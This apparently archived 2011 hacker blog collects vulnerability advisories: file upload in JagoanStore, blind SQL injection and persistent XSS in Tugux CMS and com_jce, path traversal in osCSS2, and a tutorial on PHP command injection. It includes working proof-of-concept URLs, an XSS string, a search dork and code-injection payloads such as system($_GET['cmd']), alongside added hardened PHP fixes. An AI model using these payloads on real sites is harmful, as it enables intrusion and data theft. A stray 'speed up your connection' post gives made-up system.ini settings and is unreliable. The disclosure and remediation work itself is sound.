===================================================================
JagoanStore CMS Arbitrary file upload vulnerability
===================================================================
Software: JagoanStore CMS
Vendor: www.jagoanstore.com
Price: Rp.900.000 (IDR)
Vuln Type: Arbitrary file upload
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss-advisories.blogspot.com
Gratz: Devilzc0de, YOGYACARDERLINK, and YOU !!!
===================================================================
description:
JagoanStore is a CMS for building an online shop.
JagoanStore was built not only on the technical side of website creation; it is also designed so that your online shop website can become a powerful weapon for your business.
Now you can just focus on increasing your online sales.
----------------------------------
Vulnerability details:
JagoanStore CMS uses an old version of FCKeditor for file uploads, and that upload is available to all users. As everyone knows, the old versions of FCKeditor have a vulnerability: an attacker might be able to upload arbitrary files containing malicious PHP code because multiple file extensions aren't properly checked.
Here is the code:
/manage/fckeditor/editor/filemanager/connectors/php/config.php
global $Config ;
// SECURITY: You must explicitly enable this "connector". (Set it to "true").
// WARNING: don't just set "$Config['Enabled'] = true ;", you must be sure that only
// authenticated users can access this file or use some kind of session checking.
$Config['Enabled'] = true ; // <= 1
---
// Path to user files relative to the document root.
$Config['UserFilesPath'] = '/userfiles/' ; // <= this is the path where the attacker's file or shell backdoor will be placed.
// It is recommended to leave the following setting enabled.
$Config['ForceSingleExtension'] = true ; // <= 2
$Config['AllowedExtensions']['File'] = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', 'gzip', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'ods', 'odt', 'pdf', 'png', 'ppt', 'pxd', 'qt', 'ram', 'rar', 'rm', 'rmi', 'rmvb', 'rtf', 'sdc', 'sitd', 'swf', 'sxc', 'sxw', 'tar', 'tgz', 'tif', 'tiff', 'txt', 'vsd', 'wav', 'wma', 'wmv', 'xls', 'xml', 'zip') ; // <= 3
$Config['AllowedExtensions']['Image'] = array('bmp','gif','jpeg','jpg','png') ;
---
With the default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code because multiple file extensions aren't properly checked.
----------------------------------
exploit & p0c
[!] http://host/manage/fckeditor/editor/filemanager/connectors/uploadtest.html // upload your file here
or
[!] http://host/path_to_CMSBalitbang/manage/fckeditor/editor/filemanager/connectors/uploadtest.html
Your shell or file will be placed here:
[!] http://localhost/userfiles/ <= here
NB: You can use the trick from pentesters.ir about FCKeditor :D
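The check the upload connector should apply before anything lands in /userfiles/, as an added example (my code, not JagoanStore's or FCKeditor's): it enforces the intent of the ForceSingleExtension and AllowedExtensions settings quoted above. The allowlist is the "File" list from that config.php; sanitize_upload_name() and SCRIPT_EXTENSIONS are my names.

```php
<?php
// Added example, not JagoanStore or FCKeditor code: the check an upload handler
// should run before storing a file under /userfiles/. It enforces the intent of
// the ForceSingleExtension and AllowedExtensions settings quoted above. The
// allowlist is the "File" list from that config.php; the function name is mine.

const ALLOWED_FILE_EXTENSIONS = ['7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc',
    'fla', 'flv', 'gif', 'gz', 'gzip', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4',
    'mpc', 'mpeg', 'mpg', 'ods', 'odt', 'pdf', 'png', 'ppt', 'pxd', 'qt', 'ram',
    'rar', 'rm', 'rmi', 'rmvb', 'rtf', 'sdc', 'sitd', 'swf', 'sxc', 'sxw', 'tar',
    'tgz', 'tif', 'tiff', 'txt', 'vsd', 'wav', 'wma', 'wmv', 'xls', 'xml', 'zip'];

// Extensions the web server may execute as script; rejected even if someone
// later adds them to the allowlist (defence in depth).
const SCRIPT_EXTENSIONS = ['php', 'php3', 'php4', 'php5', 'phtml', 'phar',
    'cgi', 'pl', 'py', 'asp', 'aspx', 'jsp', 'shtml', 'htaccess'];

/**
 * Return the name to store the upload under, or null if it must be rejected.
 */
function sanitize_upload_name(string $original, array $allowed = ALLOWED_FILE_EXTENSIONS): ?string
{
    // 1. Keep only the base name (no directory parts) and only safe characters.
    $name = basename(str_replace("\0", '', $original));
    $name = preg_replace('/[^A-Za-z0-9._-]/', '_', $name);

    // 2. Force a single extension: every dot that is followed by another dot
    //    becomes "_", so "shell.php.txt" is stored as "shell_php.txt". An Apache
    //    AddHandler mapping, which recognises ".php" anywhere in a name, then
    //    has nothing left to match.
    $name = preg_replace('/\.(?=.*\.)/', '_', $name);

    // 3. Exactly one extension must remain and it must be on the allowlist.
    $dot = strrpos($name, '.');
    if ($dot === false || $dot === 0 || $dot === strlen($name) - 1) {
        return null;                     // no extension, dotfile, or trailing dot
    }
    $ext = strtolower(substr($name, $dot + 1));
    if (in_array($ext, SCRIPT_EXTENSIONS, true) || !in_array($ext, $allowed, true)) {
        return null;
    }
    return $name;
}

// Constructed sample names, including the double-extension trick the advisory
// relies on and a path-traversal attempt.
$samples = ['invoice.pdf', 'shell.php', 'shell.php.txt', 'pic.jpg.php',
            '../../etc/passwd', 'a.b.c.PNG', '.htaccess', 'photo.JPG'];
foreach ($samples as $s) {
    $r = sanitize_upload_name($s);
    printf("%-18s => %s\n", $s, $r === null ? 'REJECTED' : $r);
}
```

Running it shows shell.php.txt stored as shell_php.txt, while shell.php and pic.jpg.php are rejected outright and the traversal name collapses to "passwd" and fails the extension check.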
====================================================================
Nothing Impossible In This World Even Nobody`s Perfect
===================================================================
Time Line:
- Bug Reported to vendor
- Vendor Response and confirm the bug
- Vendor apply fix and patch
- Vendor awarded a bounty (a very kind vendor, and the first local vendor that has been this nice to me)
==========================| -=[ E0F ]=- |==========================
2011/08/22
2011/07/11
Tugux CMS 1.2 Multiple vulnerabilities (blind SQL injection & XSS)
===================================================================
Software: Tugux CMS
Vendor: www.tugux.com
Vuln Type: Blind SQL Injection
Download link: http://www.tugux.com/uploads/47/tugux_cms.rar
Author: eidelweiss
contact: admin[at]eidelweiss[dot]info
Home: www.eidelweiss.info
References:
===================================================================
Vuln c0de in page_text.php (the pid and nid GET parameters are interpolated into the SQL strings with no casting or escaping):
session_start();
require_once "scripts/connect_to_mysql.php";
if (isset($_GET['pid'])){
    $pageid=$_GET['pid'];   // raw user input, used in the three queries below
    //------------------------------------------------
    $sqlCommand="SELECT lastmodified FROM pages WHERE id='$pageid' LIMIT 1";
    $query=mysqli_query($myConnection, $sqlCommand) or die (mysqli_error($myConnection));
    while($row=mysqli_fetch_array($query)) {
        $date = $row["lastmodified"];
    }
    mysqli_free_result($query);
    //------------------------------------------------
    //------------------------------------------------
    $sqlCommand = "SELECT admin FROM pages WHERE showing='1' AND id='$pageid' LIMIT 1";
    $query = mysqli_query($myConnection, $sqlCommand) or die (mysqli_error($myConnection));
    while($row = mysqli_fetch_array($query)){
        $admin = $row["admin"];
    }
    mysqli_free_result($query);
    //------------------------------------------------
    //------------------------------------------------
    $sqlCommand = "SELECT pagebody FROM pages WHERE showing='1' AND id='$pageid' LIMIT 1";
    $query = mysqli_query($myConnection, $sqlCommand) or die (mysqli_error($myConnection));
    while($row = mysqli_fetch_array($query)){
        $body = $row["pagebody"];
    }
    mysqli_free_result($query);
}
//------------------------------------------------
if (isset($_GET['nid'])){
    $nid=$_GET['nid'];      // same pattern for the news lookup
    $sql=mysqli_query($myConnection,"SELECT title, date, admin, news FROM news WHERE id='$nid'") or die (mysqli_error($myConnection));
===================================================================
exploit & p0c
[!] page_text.php?nid=[valid nid]
[!] page_text.php?pid=[valid pid]
Example p0c
[!] http://server/page_text.php?nid=12 <= True
[!] http://server/page_text.php?nid=-12 <= False
[!] http://server/page_text.php?pid=51 <= True
[!] http://server/page_text.php?pid=-51 <= False
[+] http://server:3306 <= download the file, save it and open it with C++ or WordPad; it will show the MySQL version
[!] sample: http://server:3306 result: 5.0.92-community (uses version 5.0.92) :D
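A hardened replacement for the page_text.php lookup, as an added example (my code, not Tugux's): the true/false oracle above only works because the raw pid/nid string reaches the SQL, so the fix is strict integer validation plus a prepared statement. $myConnection and the pages table are the ones the vulnerable snippet uses; id_param() and fetch_page() are my names.

```php
<?php
// Added example, not Tugux code: a hardened replacement for the page_text.php
// lookup quoted above. $myConnection and the pages table are the ones that
// snippet uses; id_param() and fetch_page() are my names.

/**
 * Read an id parameter and accept only a positive integer. The blind-injection
 * oracle above works because the raw string reaches SQL; "-12", "12 AND 1=1"
 * or "12'" never get past this function.
 */
function id_param(array $params, string $key): ?int
{
    if (!isset($params[$key])) {
        return null;
    }
    $v = filter_var($params[$key], FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $v === false ? null : $v;
}

/** One prepared statement replaces the three string-built SELECTs on pages;
 *  the nid lookup on news takes exactly the same shape. */
function fetch_page(mysqli $db, int $pageid): ?array
{
    $sql = "SELECT lastmodified, admin, pagebody FROM pages WHERE showing='1' AND id=? LIMIT 1";
    $stmt = $db->prepare($sql);
    if ($stmt === false) {
        return null;                 // log $db->error server-side; never echo it to the client
    }
    $stmt->bind_param('i', $pageid); // sent as a typed parameter, never interpolated
    $stmt->execute();
    $stmt->bind_result($lastmodified, $admin, $pagebody);
    $row = $stmt->fetch() ? compact('lastmodified', 'admin', 'pagebody') : null;
    $stmt->close();
    return $row;
}

// Constructed request values: the two p0c probes from the advisory plus typical
// injection strings. Only values that survive id_param() may reach fetch_page().
foreach (['12', '-12', "12' AND 1=1-- ", '12abc', '', '51'] as $raw) {
    $id = id_param(['pid' => $raw], 'pid');
    printf("pid=%-18s -> %s\n", var_export($raw, true),
           $id === null ? 'rejected, respond 404' : "query pages.id = $id");
}
// In page_text.php itself (live $myConnection from connect_to_mysql.php):
// $pid  = id_param($_GET, 'pid');
// $page = $pid === null ? null : fetch_page($myConnection, $pid);
```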
===================================================================
Software: Tugux CMS
Vendor: www.tugux.com
Vuln Type: XSS
Download link: http://www.tugux.com/uploads/47/tugux_cms.rar
Author: eidelweiss
contact: admin[at]eidelweiss[dot]info
Home: www.eidelweiss.info
====================================================================
The comments.php file is vulnerable to persistent XSS.
Go to
http://server/comments.php
and put or type this XSS c0de into the comment box:
';alert(String.fromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73,68,69,76,87,69,73,83,83))//\';alert(String.fromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73,68,69,76,87,69,73,83,83))//";alert(String.fromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73,68,69,76,87,69,73,83,83))//\";alert(String.fromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73,68,69,76,87,69,73,83,83))//-->">'>
then the site will redirect you to
http://server/latest.php?nid=
and there you go.. the XSS will pop up.
p0c:
http://server/comments.php
or
http://server/path/comments.php
official site: http://www.tugux.com/comments.php
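The payload above closes a quote in whatever context the stored comment is echoed into, so the fix is context-specific output encoding when latest.php renders it. The following is an added example (my code, not Tugux's) of the two encoders needed; html_text() and js_string() are my names, and the sample comment is the advisory's payload with the String.fromCharCode text shortened.

```php
<?php
// Added example, not Tugux code: the two encoders latest.php needs when it
// renders a stored comment. The payload is the one from the advisory, with the
// String.fromCharCode text shortened; function names are mine.

/** For HTML text and quoted attribute values. */
function html_text(string $s): string
{
    // ENT_QUOTES encodes both ' and ", so the trailing ">'> cannot close a tag
    // or an attribute; ENT_SUBSTITUTE avoids returning "" on bad UTF-8.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** For a value placed inside a <script> block as a JavaScript string. */
function js_string(string $s): string
{
    // json_encode() produces a complete, quoted JS literal. The HEX flags turn
    // < > & ' " into \uXXXX, so the literal can neither end the string it is
    // in nor close </script>; on failure a safe empty literal is returned.
    $out = json_encode($s, JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP);
    return $out === false ? '""' : $out;
}

// Constructed stored comment: the advisory's payload, shortened.
$comment = <<<'PAYLOAD'
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>
PAYLOAD;

// The same comment emitted into both contexts; neither output contains a raw
// quote or angle bracket that could break out of its context.
echo '<p class="comment" title="' . html_text($comment) . '">' . html_text($comment) . "</p>\n";
echo '<script>var lastComment = ' . js_string($comment) . ";</script>\n";
```

The comment must never be placed in an inline event handler or a javascript: URL, where neither encoder is sufficient.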
Gratz:
- YOGYACARDERLINK , DEVILZC0DE , etc
- Nofia Fitri (unyu²), whitehat, note, petimati, psycothic_girl, viska agasi (dudutzkuw), wenkhairu, etc (too tired to type them all)
====================================================================
Nothing Impossible In This World Even Nobody`s Perfect
Hacking is Art
===================================================================
==========================| -=[ E0F ]=- |==========================
2011/05/28
Understanding Basic Vuln c0de for RCE (Remote Command Execution)
Author: eidelweiss
Home Page: www.eidelweiss.info
Blog Page: http://eidelweiss-advisories.blogspot.com
0x1: Introduction
What is Remote Command Execution (RCE) or arbitrary code execution (ACE)?
First, in computer security, arbitrary code execution describes an attacker's ability to execute any commands of the attacker's choice on a target machine or in a target process. The term is commonly used in "arbitrary code execution vulnerability" or "remote code execution vulnerability" to describe a software or web application bug that gives an attacker a way to execute arbitrary code. A program designed to exploit such a vulnerability is called an arbitrary code execution or remote code execution exploit. Most of these vulnerabilities allow the execution of machine code, and most exploits therefore inject and execute shellcode to give an attacker an easy way to manually run arbitrary commands. The ability to trigger arbitrary code execution from one machine on another (especially via a wide-area network such as the Internet) is often referred to as remote code execution.
Once the invader can execute arbitrary code directly on the OS, there is often an attempt at a privilege escalation exploit in order to gain additional control. This may involve the kernel itself or an account such as Administrator, SYSTEM, or root. With or without this enhanced control, exploits have the potential to do severe damage or turn the computer into a zombie, but privilege escalation helps with hiding the attack from the legitimate administrator of the system. An arbitrary remote code execution with privilege escalation vulnerability in widely deployed software is thus the worst vulnerability sub-type of them all. If bugs of this kind become known, fixes are usually made available within a few hours.
0x2: Example concept and proof of concept
Here I will try to give a basic example of Remote Command Execution in a web application or PHP script.
But you will never find this in PHP scripts unless the coder is a monkey.
1. Let's start with a real-life example. All the following examples are real-life; all of them were discovered by me in different PHP scripts.
The first example is a whois lookup script; it executes a command in the terminal to do that.
Works only on *NIX systems.
Let's take a look at the dig.php file.
Below is sample code from the dig.php file:
include("common.php");
showMenu();
echo '...';   // HTML page header, stripped from this listing
$status = $_GET['status'];
$ns = $_GET['ns'];
$host = $_GET['host'];
$query_type = $_GET['query_type']; // ANY, MX, A , etc.
$ip = $_SERVER['REMOTE_ADDR'];
$self = $_SERVER['PHP_SELF'];
.................................... Snip ..............................................
$host = trim($host);
$host = strtolower($host);
echo("Executing : dig @$ns $host $query_type");
echo '...';
//start digging in the nameserver
system ("dig @$ns $host $query_type"); // $ns, $host and $query_type come straight from the request
echo '...';
} else {
?>
From the c0de we are interested in these lines:
$ns = $_GET['ns'];
system ("dig @$ns $host $query_type");
The "ns" variable is unfiltered and can be modified by the user. An attacker can pass any command
he wants through this variable. We can execute commands like in the previous example.
If we request:
dig.php?ns=whoami&host=pw.net&query_type=NS&status=digging
the command will not work. Why? Let's split it; the server will read the code as:
system ("dig whoami pw.net NS");
and that command doesn't exist, so the execution will fail. What do we do to make it work? On *NIX systems
the terminal has an operator that chains two commands: ||. So if we make a
request like this:
dig.php?ns=||whoami||&host=pw.net&query_type=NS&status=digging
our command will be successfully executed. Why? Because the shell will read our command separately. Look at the code:
system ("dig ||whoami|| pw.net NS");
The shell will execute whoami separately from "dig" and the rest.
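What the dig.php step should have looked like, as an added example (my code, not the whois script's): validate each parameter against what it can legitimately be, then let escapeshellarg() make each one a single argument. ns, host and query_type are the request parameters the vulnerable code reads; DIG_QUERY_TYPES, valid_host() and build_dig_command() are my names.

```php
<?php
// Added example, not the whois script's code: a hardened version of the dig.php
// step shown above. ns, host and query_type are the parameters the vulnerable
// code reads; DIG_QUERY_TYPES, valid_host() and build_dig_command() are mine.
// The command line is built and returned for inspection; pass it to system()
// only when it is not null.

// Record types the form may offer ("ANY, MX, A, etc." in the original).
const DIG_QUERY_TYPES = ['A', 'AAAA', 'ANY', 'CNAME', 'MX', 'NS', 'PTR', 'SOA', 'TXT'];

/** Accept an IP literal or a DNS name made of plain labels; nothing else. */
function valid_host(string $h): bool
{
    if (filter_var($h, FILTER_VALIDATE_IP) !== false) {
        return true;
    }
    $label = '[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?';
    return strlen($h) <= 253 && preg_match("/^(?:$label\\.)*$label$/i", $h) === 1;
}

/**
 * Return the dig command line, or null if any parameter is unacceptable.
 * Validation is the real control: shell metacharacters such as | ; & ` $ ( )
 * never match a label. escapeshellarg() is the second layer; it turns whatever
 * reaches it into one quoted word, so it can only ever be a dig argument.
 */
function build_dig_command(string $ns, string $host, string $query_type): ?string
{
    $ns   = strtolower(trim($ns));
    $host = strtolower(trim($host));
    $qt   = strtoupper(trim($query_type));
    if (!valid_host($ns) || !valid_host($host) || !in_array($qt, DIG_QUERY_TYPES, true)) {
        return null;
    }
    return 'dig ' . escapeshellarg('@' . $ns) . ' ' . escapeshellarg($host) . ' ' . escapeshellarg($qt);
}

// Constructed requests: a legitimate lookup and the two from the write-up.
$requests = [
    ['ns' => 'ns1.example.net', 'host' => 'pw.net', 'query_type' => 'NS'],
    ['ns' => 'whoami',          'host' => 'pw.net', 'query_type' => 'NS'],
    ['ns' => '||whoami||',      'host' => 'pw.net', 'query_type' => 'NS'],
];
foreach ($requests as $r) {
    $cmd = build_dig_command($r['ns'], $r['host'], $r['query_type']);
    printf("ns=%-16s -> %s\n", $r['ns'], $cmd ?? 'rejected, nothing executed');
}
// ns=whoami is a syntactically valid name, so it is accepted and dig merely
// fails to resolve that nameserver; the || form is what gets refused.
```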
2. Let's continue with another example, a little more complicated than the first.
Some scripts let you modify the configuration of the website after install. Bad mistake,
because usually the configuration files are .php.
So we have the script installed. We look in the admin.php file.
Code snippet:
if(isset($action) && $action == "setconfig") {
$config_file = "config.php";
$handle = fopen($config_file, 'w');
$StringData = " $"."news_width = '".clean($_POST[news_width])."';\r
$"."bgcolor = '".clean($_POST[bgcolor])."';\r
$"."fgcolor = '".clean($_POST[fgcolor])."';\r
$"."padding = '".clean($_POST[padding])."';\r
$"."subject_margin = '".clean($_POST[subject_margin])."';\r
$"."fontname = '".clean($_POST[fontname])."';\r
$"."fontsize = '".clean($_POST[fontsize])."';\r\n?>";
fwrite($handle, $StringData);
}
We see here that the script saves the settings in the config.php file.
Now let's see the config.php file content:
Code snippet:
$news_width = '600px';
$bgcolor = '#000000';
$fgcolor = '#ffffff';
$padding = '5px';
$subject_margin = '0px';
$fontname = 'verdana';
$fontsize = '13px';
?>
So we can inject PHP code in news_width, for example. Now things get
more complicated. We can inject our code, but we must pay attention to the code.
I will show you an example to understand what I mean.
We will inject the following PHP code in the news_width variable. The code will be
written into the config.php file. Let's go to admin.php?action=setconfig and
inject the code.
Code:
The code will become:
$news_width = '';
$bgcolor = '#000000';
$fgcolor = '#ffffff';
$padding = '5px';
$subject_margin = '0px';
$fontname = 'verdana';
$fontsize = '13px';
?>
And that is wrong. If we request the config.php file we will get a parse error,
something like this:
Parse error: parse error in /var/www/config.php on line 3
So we must inject something more complicated:
';system($_GET['cmd']);'
Why this code? Look, the code inside the config.php file will become:
$news_width = '';system($_GET['cmd']);'';
$bgcolor = '#000000';
$fgcolor = '#ffffff';
$padding = '5px';
$subject_margin = '0px';
$fontname = 'verdana';
$fontsize = '13px';
?>
Let's split it:
$news_width = '';
system($_GET['cmd']);
'';
No parse error, so we can successfully execute our commands. Let's make the request:
config.php?cmd=whoami
No more || because we don't need it; only our command is executed.
3. Let's go to the next example. In this script the news is saved in the news.txt file.
Let's see the contents of the news.txt file:
test |
Posted on: 13/05/2011 |
test |
We can add what we want. We can inject our code and nothing will happen because it is a .txt file? Wrong.
Let's search the script deeper. We go to post news by accessing post.php.
Let's take a look at post.php:
$newsfile = "news.txt";
$file = fopen($newsfile, "r");
..........................................................................
elseif ((isset($_REQUEST["title"])) && (isset($_REQUEST["date"])) &&
        (isset($_REQUEST["post"])) && ($_REQUEST["title"]!="") &&
        ($_REQUEST["date"]!="") && ($_REQUEST["post"]!="")) {
    $current_data = @fread($file, filesize($newsfile));
    fclose($file);
    $file = fopen($newsfile, "w");
    // stripslashes() only undoes magic_quotes; nothing is escaped or validated
    $_REQUEST["post"] = stripslashes(($_REQUEST["post"]));
    $_REQUEST["date"] = stripslashes(($_REQUEST["date"]));
    $_REQUEST["title"] = stripslashes(($_REQUEST["title"]));
    if(fwrite($file,$btable . " " . $btitle . " " . $_REQUEST["title"] . " " . $etitle . " " . $bdate . " " . $_REQUEST["date"] . " " . $edate . " " . $bpost . " " . $_REQUEST["post"] . " " . $epost . " " . $etable . "\n " . $current_data))
        include 'inc/posted.html';
    else
        include 'inc/error1.html';
    fclose($file);
}
We can see here how the news is written to the news.txt file. Input is not filtered, of course.
Now the news must be displayed to visitors. How does the script do that? Let's take a look at the
display.php file.
Code snippet:
include("news.txt");
?>
Nice, the news.txt content is included in the display.php file. What do we do? We go to post.php
and add some news.
We will inject our code in the "title" variable. We write there the following code:
so the news.txt content will become:
Posted on: 13/05/2011 |
test2 |
test |
Posted on: 13/05/2011 |
test |
And our evil code is there. Let's take a look at display.php. That file includes the content of news.txt, so the code in display.php will look like:
Posted on: 13/05/2011 |
test2 |
test |
Posted on: 13/05/2011 |
test |
?>
No parse error or any other problem, so we can go to:
display.php?cmd=whoami
and execute our commands successfully.
4. Now a slightly more complicated script than the previous ones.
In this script, when we register, our details are saved in PHP files.
For example, let's take a look at the c0de in the add_reg.php file:
Code snippet:
$user = $_POST['user'];
$pass1 = $_POST['pass1'];
$pass2 = $_POST['pass2'];
$email1 = $_POST['email1'];
$email2 = $_POST['email2'];
$location = $_POST['location'];
$url = $_POST['url'];
$filename = "./sites/".$user.".php";
................... Snip ...........................
$html = "\$regdate = \"$date\";
\$user = \"$user\";
\$pass = \"$pass1\";
\$email = \"$email1\";
\$location = \"$location\";
\$url = \"$url\";
?>";
$fp = fopen($filename, 'a+');
fputs($fp, $html) or die("Could not open file!");
We can see that the script creates a PHP file in the "sites" directory (ourusername.php).
The script saves all the user data in that file, so we can inject our evil code into one
field; I choose the "location" variable.
So if we register as a user with the location (set the "location" value):
the code inside ourusername.php will become:
$regdate = "13 mei 2011, 4:16 PM";
$user = "pwned";
$pass = "pwned";
$email = "pwned@yahoo.com";
$location = "";
$url = "http://google.com";
?>
So we will get a parse error. Not good. We must inject more complicated code
to get the result that we want.
Let's add this code:
\";?>
So the code inside ourusername.php will become:
$regdate = "13 mei 2011, 4:16 PM";
$user = "pwned";
$pass = "pwned";
$email = "pwned@yahoo.com";
$location = "";?> $url = "http://google.com";
?>
and we will have no error. Why? See the code:
$location = "";?>
Let's split it:
$location = "";
?>
We set the location value to "", close the first PHP tags, open the tags
again, write our evil code, close the tags, open new ones and add a variable
"xxx" because we don't want any error. I wrote that code because I want no
error; it can be made smaller but will give some errors (which will not
stop us from executing commands, but looks ugly).
So we can go to:
sitestarg.et/ourusername.php?cmd=whoami
and successfully execute our commands!!!
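Examples 2, 3 and 4 share one root cause: request data is written into a file that PHP later executes (config.php, the include()d news.txt, sites/ourusername.php). The following added example (my code, not from any of those scripts) shows the single fix for all three, storing values as data rather than as source, using the payload fragments quoted above as input; write_settings_file(), read_settings_file() and render_news() are my names.

```php
<?php
// Added example, not code from any of the scripts in the write-up. Examples 2,
// 3 and 4 all persist request data into a file that PHP later executes
// (config.php, the include()d news.txt, sites/<user>.php). The fix is the same
// for all three: store values as data, never as source. write_settings_file(),
// read_settings_file() and render_news() are my names; the payloads are the
// fragments quoted above.

/** Replaces the fwrite()-built config.php and sites/<user>.php: values become
 *  PHP string literals via var_export(), so quotes and ?> inside them are inert. */
function write_settings_file(string $path, array $settings): void
{
    $php = "<?php\nreturn " . var_export($settings, true) . ";\n";
    file_put_contents($path, $php, LOCK_EX);
}

/** The file is still PHP, but the only thing it can do is return the array. */
function read_settings_file(string $path): array
{
    $data = include $path;
    return is_array($data) ? $data : [];
}

/** Replaces include("news.txt"): a data file is read and escaped, never executed. */
function render_news(string $newsfile): string
{
    return nl2br(htmlspecialchars(file_get_contents($newsfile), ENT_QUOTES, 'UTF-8'));
}

$dir = sys_get_temp_dir() . '/rce_demo_' . getmypid();
mkdir($dir);

// Constructed input: the example-2 payload in news_width and the example-4
// fragment in location, exactly as a form could submit them.
$settings = [
    'news_width' => "';system(\$_GET['cmd']);'",
    'bgcolor'    => '#000000',
    'location'   => '\\";?>',
];
write_settings_file("$dir/config.php", $settings);
echo file_get_contents("$dir/config.php");          // every value is a quoted literal
$back = read_settings_file("$dir/config.php");
var_dump($back === $settings);                        // the data round-trips unchanged

// Constructed news entry whose title carries a PHP tag (example 3).
file_put_contents("$dir/news.txt", "<?php echo 'injected'; ?> | Posted on: 13/05/2011 | test\n");
echo render_news("$dir/news.txt"), "\n";              // shown as text, never run

array_map('unlink', ["$dir/config.php", "$dir/news.txt"]);
rmdir($dir);
```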
2011/05/24
Tips and Tricks to Speed Up Your Connection
First step, on the PC:
1. Click Start => Run => Control Panel => Network Connections
Right-click Local Area Connection => Properties => Internet Protocol (TCP/IP). OK, then change the preferred DNS server from its initial value, say 192.168.5.10, to 208.67.222.222, and fill the empty alternate DNS server with 208.67.220.220, to freshen things up a bit... when all of that is done, just click OK everywhere.
2. Right-click My Computer => Properties => Hardware => Device Manager => double-click Ports (COM & LPT) => double-click Communications Port => then choose Port Settings => change Bits per second to 128000 => and Flow control to Hardware.
Second step, in the Mozilla browser:
1. Type "about:config" (without the quotes) in the URL bar at the top, then press Enter; a warning text will appear, then click "I'll be careful, I promise".
- Network.http.pipelining; False <- double-click and change "False" to "True"
- Network.http.pipelining.maxrequests; 4 <- double-click and change "4" to "30"
- Network.http.proxy.pipelining; False <- double-click and change "False" to "True"
Then right-click an empty/white area, choose New, then Integer, enter nglayout.initialpaint.delay in the first field, press Enter once, enter the number 0 and press Enter again.
Then restart Mozilla Firefox.
Next step, for video buffering:
Click Start => Run => system.ini
then add the code below
page buffer=1000000Tbps
load=1000000Tbps
download=1000000Tbps
save=1000000Tbps
back=1000000Tbps
search=1000000Tbps
sound=1000000Tbps
webcam=1000000Tbps
voice=1000000Tbps
faxmodemfast=1000000Tbps
update=1000000Tbps
Save when done.
Next, open Mozilla again.
Then click Tools => Options => Advanced => Network => Settings => Manual proxy configuration
and fill in your proxy.
When done, close everything, restart Mozilla again and repair your Local Area Connection.
2011/04/08
joomlacontenteditor (com_jce) BLIND sql injection vulnerability
===================================================================
joomlacontenteditor (com_jce) BLIND sql injection vulnerability
===================================================================
Software: joomlacontenteditor (com_jce)
Vendor: www.joomlacontenteditor.net
Vuln Type: Blind SQL Injection
Download link: http://www.joomlacontenteditor.net/downloads/editor/joomla15x/category/joomla-15-2 (check here)
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
Dork: inurl:"/index.php?option=com_jce"
===================================================================
Description:
JCE makes creating and editing Joomla!® content easy.
Add a set of tools to your Joomla!® environment that give you the power to create the kind of content you want, without limitations, and without needing to know or learn HTML, XHTML, CSS...
===================================================================
exploit & p0c
[!] index.php?option=com_jce&Itemid=[valid Itemid]
Example p0c
[!] http://host/index.php?option=com_jce&Itemid=8 <= True
[!] http://host/index.php?option=com_jce&Itemid=-8 <= False
====================================================================
Nothing Impossible In This World Even Nobody`s Perfect
===================================================================
==========================| -=[ E0F ]=- |==========================
2011/03/30
osCSS2 2.1.0 RC12 Multiple Local File Inclusion Vulnerabilities
===================================================================
osCSS2 2.1.0 RC12 Multiple Local File Inclusion Vulnerabilities
===================================================================
Software: osCSS2 2.1.0 RC12
Vendor: http://www.oscss.org/
Vuln Type: Local File Inclusion
Download link: http://sourceforge.net/projects/oscss/files%2Foscss-2%2FosCSS 2.1. Final%2FosCSS2_2.1.0_preRC12.zip/download
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
Gratz: welcome back YOGYACARDERLINK.web.id !!!
===================================================================
description:
osCSS is a PHP e-commerce shopping program, built on a foundation of osCommerce GPL code.
This version brings the script to web standards, using XHTML 1.1 Strict as the markup language and CSS for layout presentation.
----------------------------------
Vulnerability Details:
Some vulnerabilities were discovered by John Leitch (AutoSec Tools) that can be exploited via the browser (XSS & LFI):
http://www.exploit-db.com/exploits/17069/
http://localhost/oscss2/admin108/index.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
http://localhost/oscss2/admin108/popup_image.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
-----------------------------------
Here is another piece of vulnerable code I found there:
[!] admin/includes/template/oscss/gabarit-view.php
[!] admin/includes/template/defaut/gabarit-view.php
*/
$css=($_GET['forceview']=='print')? 'print' : 'view' ;
$CHARSET=(isset($_GET['forcecharset']))?$_GET['forcecharset'] : CHARSET ;
@include(DIR_WS_INCLUDES . 'content/'.$page_admin.'.top.inc');
require(DIR_WS_TEMPLATE.'inc/lib.template.php');
?>
-----------------------------------
[!] admin/includes/template/oscss/gabarit-2.php
*/
@include(DIR_WS_INCLUDES . 'content/'.$page_admin.'.top.inc');
require(DIR_WS_TEMPLATE.'inc/lib.template.php');
if (($init_theme=tep_test_gab_ele('inc/init_theme')) !=false) require($init_theme);
?>
-----------------------------------
exploit & p0c
[!] http://host/path_to_oscss/admin/includes/template/oscss/gabarit-view.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
or
